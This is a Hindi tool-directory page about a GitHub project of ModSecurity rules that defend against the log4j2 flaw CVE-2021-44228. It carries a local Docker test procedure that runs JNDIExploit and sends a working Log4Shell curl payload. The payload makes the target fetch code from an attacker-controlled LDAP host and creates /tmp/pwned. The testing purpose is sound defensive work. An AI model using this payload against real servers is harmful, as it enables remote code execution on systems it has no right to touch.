Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ModSec-log4j2 — log4j2 सुरक्षा के लिए ModSec नियम - CVE-2021-44228 | Kitploit
उपकरण/GitHubGitHub/felipe8398/modsec-log4j2
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubfelipe8398/modsec-log4j2

ModSec-log4j2

log4j2 सुरक्षा के लिए ModSec नियम - CVE-2021-44228

रिपॉजिटरी देखें
44 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ModSec नियम का परीक्षण

पूर्व आवश्यकताएँ

  • Docker स्थापित होना चाहिए
  • आपकी मशीन पर Java स्थापित होना चाहिए

परीक्षण चलाना

  • रिपॉजिटरी का git clone करें
  • WAF (ModSec) और कमजोर एप्लिकेशन को ऊपर लाने के लिए नीचे दिए गए कमांड को चलाएँ
root@kitploit:~
docker stack deploy -c docker-compose.yml WAF
  • रिपॉजिटरी में मौजूद JNDIExploit.v1.2.zip को निकालें, फोल्डर में जाएँ और नीचे दिए गए कमांड को चलाएँ, ध्यान दें कि $IP आपकी मशीन का IP होना चाहिए, 127.0.0.1 का उपयोग न करने की सलाह दी जाती है
root@kitploit:~
java -jar ./JNDIExploit-1.2-SNAPSHOT.jar -i $IP -p 8888
  • RCE का परीक्षण करने के लिए नीचे दिए गए curl को चलाएँ, $IP को अपनी मशीन के IP से बदलें, यह कमजोर एप्लिकेशन के /tmp के अंदर pwned नामक फ़ाइल बनाएगा
root@kitploit:~
curl 127.0.0.1:80 -H 'X-Api-Version: ${jndi:ldap://$IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

विश्वविद्यालय के छात्रों के प्रश्न

1- कैसे पता करें कि मेरा WAF और कमजोर WEB एप्लिकेशन ऊपर आ गया है?

चलाएँ docker service ls , और जाँचें कि दो सेवाएँ हैं जिनमें से प्रत्येक में एक प्रतिकृति है।

2- modsec का लॉग कैसे प्राप्त करें?

चलाएँ docker exec -ti $(docker container ls | grep "felipe8398/redirector:latest"| awk '{print $1}') cat /var/log/apache2/error.log

3- कैसे जाँचें कि RCE सफल नहीं हुआ?

हमने जो curl का उपयोग किया है वह tmp के अंदर pwned नामक फ़ाइल बनाता है, इसलिए हमें निम्नलिखित चलाना होगा docker exec -ti $(docker container ls | grep ghcr.io/christophetd/log4shell-vulnerable-app:latest | awk '{print $1}') ls /tmp

टूल डाउनलोड करें